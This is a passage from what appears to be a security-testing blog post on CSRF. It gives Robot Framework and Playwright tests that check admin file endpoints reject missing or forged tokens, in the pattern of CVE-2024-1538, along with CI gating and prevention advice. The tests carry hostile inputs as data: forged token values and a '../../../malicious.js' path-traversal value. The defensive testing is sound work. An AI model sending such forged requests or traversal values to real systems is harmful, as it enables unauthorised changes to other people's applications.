app /admin/file/rename ... json={"old_name": "file.txt", "new_name": "hacked.txt"} ... headers=${headers} Should Be Equal As Strings ${response.status_code} 403 CSRF Forged Token On File Rename Returns 403 Create Session app ${BASE_URL} ${headers}= Create Dictionary ... X-CSRF-Token=attacker-forged-token-abc123 ${response}= POST On Session app /admin/file/rename ... json={"old_name": "file.txt", "new_name": "hacked.txt"} ... headers=${headers} Should Be Equal As Strings ${response.status_code} 403 CSRF Missing Token On Lang Parameter Returns 403 # mirrors exact CVE-2024-1538 attack surface: # lang parameter on wp_file_manager with no nonce validation Create Session app ${BASE_URL} ${headers}= Create Dictionary X-CSRF-Token=${EMPTY} ${response}= POST On Session app /admin/file-manager ... json={"lang": "../../../malicious.js"} ... headers=${headers} Should Be Equal As Strings ${response.status_code} 403 CSRF No State Mutation When Token Missing Create Session app ${BASE_URL} ${headers}= Create Dictionary X-CSRF-Token=${EMPTY} POST On Session app /admin/file/rename ... json={"old_name": "file.txt", "new_name": "hacked.txt"} ... headers=${headers} ${files_response}= GET On Session app /admin/files Should Not Contain ${files_response.json()["files"]} hacked.txt Should Contain ${files_response.json()["files"]} file.txt </code></pre> </div> <h3> TypeScript — Playwright API testing </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">test</span><span class="p">,</span> <span class="nx">expect</span><span class="p">,</span> <span class="nx">APIRequestContext</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@playwright/test</span><span class="dl">'</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">apiContext</span><span class="p">:</span> <span class="nx">APIRequestContext</span><span class="p">;</span> <span class="nx">test</span><span class="p">.</span><span class="nf">beforeAll</span><span class="p">(</span><span class="k">async </span><span class="p">({</span> <span class="nx">playwright</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">apiContext</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">playwright</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nf">newContext</span><span class="p">({</span> <span class="na">baseURL</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://your-app.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">});</span> <span class="c1">// authenticate once, reuse session across all CSRF tests</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">username</span><span class="p">:</span> <span class="dl">'</span><span class="s1">admin</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test_password</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">test</span><span class="p">.</span><span class="nf">afterAll</span><span class="p">(</span><span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">dispose</span><span class="p">();</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CSRF — empty token on file rename returns 403</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// CVE-2024-1538 pattern: missing nonce = server must reject</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/file/rename</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">old_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">file.txt</span><span class="dl">'</span><span class="p">,</span> <span class="na">new_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">hacked.txt</span><span class="dl">'</span> <span class="p">},</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">X-CSRF-Token</span><span class="dl">'</span><span class="p">:</span> <span class="dl">''</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">403</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CSRF — forged token on file rename returns 403</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// attacker-controlled token value must be rejected</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/file/rename</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">old_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">file.txt</span><span class="dl">'</span><span class="p">,</span> <span class="na">new_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">hacked.txt</span><span class="dl">'</span> <span class="p">},</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">X-CSRF-Token</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">attacker-forged-token-abc123</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">403</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CSRF — missing token on lang parameter returns 403</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// mirrors exact CVE-2024-1538 attack surface:</span> <span class="c1">// lang parameter on wp_file_manager page, no nonce validation</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/file-manager</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">lang</span><span class="p">:</span> <span class="dl">'</span><span class="s1">../../../malicious.js</span><span class="dl">'</span> <span class="p">},</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">403</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CSRF — no state mutation when token is missing</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/file/rename</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">old_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">file.txt</span><span class="dl">'</span><span class="p">,</span> <span class="na">new_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">hacked.txt</span><span class="dl">'</span> <span class="p">},</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">X-CSRF-Token</span><span class="dl">'</span><span class="p">:</span> <span class="dl">''</span> <span class="p">}</span> <span class="p">});</span> <span class="c1">// state must be unchanged — file must not have been renamed</span> <span class="kd">const</span> <span class="nx">files</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/files</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">files</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">body</span><span class="p">.</span><span class="nx">files</span><span class="p">).</span><span class="nx">not</span><span class="p">.</span><span class="nf">toContain</span><span class="p">(</span><span class="dl">'</span><span class="s1">hacked.txt</span><span class="dl">'</span><span class="p">);</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">body</span><span class="p">.</span><span class="nx">files</span><span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="dl">'</span><span class="s1">file.txt</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CSRF — valid token on file rename succeeds</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// confirm the protection does not block legitimate requests</span> <span class="kd">const</span> <span class="nx">tokenResponse</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/csrf-token</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">token</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">tokenResponse</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/admin/file/rename</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">old_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">file.txt</span><span class="dl">'</span><span class="p">,</span> <span class="na">new_name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">renamed.txt</span><span class="dl">'</span> <span class="p">},</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">X-CSRF-Token</span><span class="dl">'</span><span class="p">:</span> <span class="nx">token</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">200</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Run CSRF tests in isolation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npx playwright <span class="nb">test</span> <span class="nt">--grep</span> <span class="s2">"CSRF"</span> </code></pre> </div> <p><code>playwright.config.ts</code> for CI:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">defineConfig</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@playwright/test</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="nf">defineConfig</span><span class="p">({</span> <span class="na">testDir</span><span class="p">:</span> <span class="dl">'</span><span class="s1">./tests/security</span><span class="dl">'</span><span class="p">,</span> <span class="na">use</span><span class="p">:</span> <span class="p">{</span> <span class="na">baseURL</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">APP_URL</span> <span class="o">||</span> <span class="dl">'</span><span class="s1">https://your-app.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">},</span> <span class="na">projects</span><span class="p">:</span> <span class="p">[</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">csrf-security</span><span class="dl">'</span><span class="p">,</span> <span class="na">testMatch</span><span class="p">:</span> <span class="dl">'</span><span class="s1">**/csrf.spec.ts</span><span class="dl">'</span><span class="p">,</span> <span class="p">}</span> <span class="p">]</span> <span class="p">});</span> </code></pre> </div> <h3> CI/CD gate </h3> <p>These tests belong in GitLab CI as a <strong>blocking job on every merge <br> request</strong> — not an optional security scan that runs weekly.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">csrf-security-tests</span><span class="pi">:</span> <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span> <span class="na">script</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">pytest tests/security/test_csrf.py -v</span> <span class="pi">-</span> <span class="s">npx playwright test --grep "CSRF"</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_PIPELINE_SOURCE</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">"merge_request_event"'</span> <span class="na">allow_failure</span><span class="pi">:</span> <span class="kc">false</span> </code></pre> </div> <p>A 200 response on a missing-token request is an unambiguous pipeline failure condition. Pair with a Semgrep static analysis job that scans for route handlers missing CSRF middleware — the static check catches the pattern before deployment, the runtime tests confirm enforcement in the running application.</p> <h3> Burp Suite </h3> <p>Before writing a single automated test, use Burp Suite to map your <br> attack surface. Intercept a legitimate authenticated request to an admin endpoint, strip the CSRF token from the headers, and replay it. If it returns 200, you have a confirmed finding. Ten minutes per endpoint tells you where the gaps are before you spend time automating.</p> <h3> Environment note </h3> <p>Running CSRF tests locally is not the same as running them against your full stack. Some CDN edge configurations strip custom headers, including your CSRF token, before the request reaches the application server. A request that correctly returns 403 locally may return 200 in staging because the CDN silently dropped the token. Always run your CSRF suite against an environment that mirrors the full production network path.</p> <p>🔬 <strong>Practice this yourself:</strong> <a href="https://yuriysafron.com/qa-sandbox/csrf/" rel="noopener noreferrer">yuriysafron.com/qa-sandbox/csrf</a></p> <h2> Why AI fails here </h2> <p>When a team asks GitHub Copilot to generate CSRF tests, what they get is a test that logs in, submits a form with a valid token, and asserts a 200 response. The test passes. The team sees green and believes they have CSRF coverage.</p> <p>They have a happy-path test with a CSRF token in it. That is not the same thing.</p> <p>The structural reason LLMs cannot reason about this vulnerability class: <strong>CSRF is a relationship between origins, not a property of a single request.</strong> <br> LLMs generate tests in isolation. They model what a correct request looks like. They do not model what a forged request from an attacker-controlled page looks like.</p> <p>The concrete failure: a team ships a new admin file management module. All AI-generated tests pass. A researcher finds CVE-2024-1538 class behavior three weeks after release. The rename endpoint accepts requests with no token at all. The AI-generated suite never submitted a request without a token. The bug was always there. The suite never asked the question that would have found it.</p> <h2> How to prevent </h2> <p><strong>1. Synchronizer token pattern</strong> — implement at the middleware level across every state-changing endpoint. Framework-level enforcement means indvidual developers cannot accidentally skip validation on new endpoints. If each developer must remember to add the check manually, someone will forget. Put it in the middleware.</p> <p><strong>2. SameSite cookie attributes</strong> — <code>SameSite=Strict</code> or <code>SameSite=Lax</code> instructs the browser not to send cookies on cross-origin requests. Defense-in-depth, not a replacement for token validation. Older clients and certain redirect flows can bypass <code>SameSite=Lax</code>.</p> <p><strong>3. Origin and Referer header validation</strong> — the server checks that the <code>Origin</code> header matches its own domain. If it does not match, reject the request. Reliable secondary control when combined with the other two.</p> <p>Prevention only works if your test suite actively verifies each of these controls is enforced. A token pattern that is implemented but never tested is a token pattern that someone will quietly remove in a refactor and you will not know until production.</p> <h2> Conclusion </h2> <p>Working on a cybersecurity platform protecting U.S. critical <br> infrastructure and multiple branches of the U.S. military gives you a specific perspective on what a missed test actually costs.</p> <p>CSRF is not an academic edge case in that environment. It is the kind of gap that ends careers and makes headlines.</p> <p>The tests that matter most are never the ones that verify the feature works. They are the ones that verify the system <strong>refuses to do the wrong thing</strong>. CSRF lives exactly in that gap and most teams have never written a test that looks for it.</p> <p><em>Which endpoint in your current system would fail this test right now?</em></p> <p><em>Part of the **Break It on Purpose</em>* series - published weekly for QA engineers and SDETs who find bugs before attackers do.*</p> <p>🔬 Practice sandbox: <a href="https://yuriysafron.com/qa-sandbox" rel="noopener noreferrer">yuriysafron.com/qa-sandbox</a><br><br> 🔗 <a href="https://linkedin.com/in/yuriy-safronnynov" rel="noopener noreferrer">linkedin.com/in/yuriysafronnynov</a></p> security testing python webdev